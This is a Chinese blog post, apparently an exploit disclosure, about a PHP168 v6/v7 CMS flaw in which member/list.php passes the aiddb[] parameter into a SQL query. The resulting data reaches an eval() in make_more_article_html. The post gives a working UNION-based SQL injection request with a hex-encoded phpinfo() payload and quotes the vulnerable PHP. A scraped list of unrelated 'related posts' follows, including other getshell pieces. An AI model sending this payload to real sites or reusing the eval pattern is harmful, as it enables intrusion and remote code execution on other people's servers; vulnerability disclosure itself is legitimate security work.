刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:

1.网站配置为:文章生成真静态

2.允许注册会员

给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。

member/list.php?step=2&type=delete&aiddb[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7b247b706870696e666f28297d7d,6,7%23

0x01 漏洞在make_more_article_html这个函数:

function make_more_article_html($comebackurl='/',$type='',$aiddb=''){

global $db,$pre,$webdb,$webdb,$showhtml_type;

if($webdb[newsmakehtml]!=1||$aiddb=='') // $webdb[newsmakehtml] 真静态

{ return ;}

...

$query = $db->query("select a.*,b.bencandy_html,b.list_html,d.aid from {$pre}article_db d left join {$pre}article a on d.aid=a.aid left join {$pre}sort b on a.fid=b.fid where d.aid in ($string)");

while($rs = $db->fetch_array($query)){

...

$filename_b=$rs[bencandy_html];

...

eval("\$showurl=\"$filename_b\";");

...

0x02 在 \member\list.php中调用了该漏洞函数:

if($step==2){

...

if($type=='delete'){

make_more_article_html("$fromurl","del_0",$aiddb);

by:k4shifz[w.s.t]

希望与广大网友互动??

点此进行留言吧!

php168 shell,php168 v6/v7鸡肋Getshell安全问题相关推荐

  1. 天天团购后台Getshell安全问题

    后台注射,向数据库插入代码.exp需要填写四个参数 $host.$path.$formhash.$cookie.提交后,前台登录执行代码. <?php /* TianTian Tuangou g ...

  2. 深度学习_目标检测_YOLOv1,v2,v3,v4,v5,v6,v7全系列详解(持续更新)

    [Make YOLO Great Again]栏目专注于从更实战,更深刻的角度解析YOLOv1-v7这个CV领域举足轻重的算法系列,并给出其在业务侧,竞赛侧以及研究侧的延伸思考.欢迎大家一起交流学习

  3. 揭开芯面纱 主流平板电脑方案深度剖析之ARMv5,v6,v7架构阵营

    一.全文框架 按阵营分为: Ⅰ.ARMv5架构阵营,代表核心: ARM9核心 Ⅱ.ARMv6架构阵营,代表核心: ARM11核心 Ⅲ.ARMv7架构阵营,代表核心: ① 高通Scorpion核心 ②C ...

  4. shell 写入文件_phpMyAdmin利用日志文件GetSHELL

    phpMyAdmin简介 phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序 ...

  5. SSH secure shell 权威指南(转载)

    本书是一本介绍通信安全的书籍,如果你想保障你的通信安全,本书能给你一个很好的解决方案.本书从ssh协议介绍起,到具体的开源实现和商业实现.但本书同时介绍开源实现和商业实现,给人感觉比较乱. 注意:由于 ...

  6. 渗透测试-getshell学习总结

    getshell学习总结 文章目录 getshell学习总结 一.方法分类 1.带有漏洞的应用 2.常规漏洞 3.后台拿shell 二.网站常见getshell方法 1.数据库备份拿shell 2.上 ...

  7. GETSHELL学习总结

    分类 带有漏洞的应用 redis .tomcat.解析漏洞.编辑器.FTP 常规漏洞 sql注入.上传.文件包含.命令执行.Struts2.代码反序列化 后台拿shell 上传.数据库备份.配置插马 ...

  8. 学习笔记-B/S - Exploits

    B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeC ...

  9. 170907 WarGames-Behemoth(5-6)

    1625-5 王子昂 总结<2017年9月7日> [连续第339天总结] A. WarGames-Behemoth B. Level 5 int __cdecl __noreturn ma ...

  10. cms建站系统有哪些,各自的特点是什么?

    CMS是 Content Management System的英文缩写 中文名称是: 网站内容管理系统. CMS是一个综合整站解决方案,有点类系系统集成说的Total Solution.CMS应该是以 ...

最新文章

  1. Redis的多种启动方式比较!
  2. POJ1042 贪心钓鱼
  3. 03-高级选择器,属性选择器,伪类选择器
  4. 一个很简短的 JS 生成器入门和用法参考
  5. Java中Object.equals与String.equals的区别
  6. os_mutex.c(全)
  7. 4.2.1 磁盘的结构
  8. java文件名特殊字符_Java 8:用名字读取特殊字符的文件
  9. 200903阶段一C++
  10. Python Tricks(十六)—— list转换为str
  11. GBin1专题之Web热点#10
  12. ajax请求后台php数据时查看报错parse error
  13. k310.4安装客户端提示self-registration error
  14. HCIP 2020 8月 自考题库全解析附题库2种版本+练习软件
  15. 设计模式-模板方法模式-以简历模板为例
  16. 打开SharePoint时遇到“Server error: http://go.microsoft.com/fwlink?LinkID=96177”
  17. c++ 求解一元二次方程 全面考虑实根和虚根的情况
  18. 怎样搭建后缀是.gitee.io的网站?如何免费在码云Gitee中部署个人静态网站?(或者个人博客)如何建立免费网站?
  19. 做短视频的小技巧,如何配音是关键,找对主题也不能忘记
  20. CVPR 2020学术竞赛大盘点,中国团队揽获众多冠军

热门文章

  1. android屏幕内容实时传输,在设备之间无缝传输内容
  2. 使用pyspider框架抓取猫途鹰旅游信息
  3. 好玩的C语言大全,好玩的c语言程序!
  4. universal installer里面没有已安装的产品_【ns11系统之usb安装工具配套】安装工具已经更新至4.5【后面附上批处理内容修改】...
  5. 【项目篇- 封面后目录前的核心内容、优势展示部分如何打磨?(超全图文总结建议)】创新创业竞赛项目计划书、新苗国创(大创)申报书
  6. 利用 FFT 模拟菲涅尔衍射积分
  7. 2018年蓝桥杯省赛 明码
  8. 电量统计(1)-原理
  9. 关于AP没办法获取IP地址故障排查及思路。
  10. 航测正射如何用Pix4D处理大疆无人机照片生成正射影像图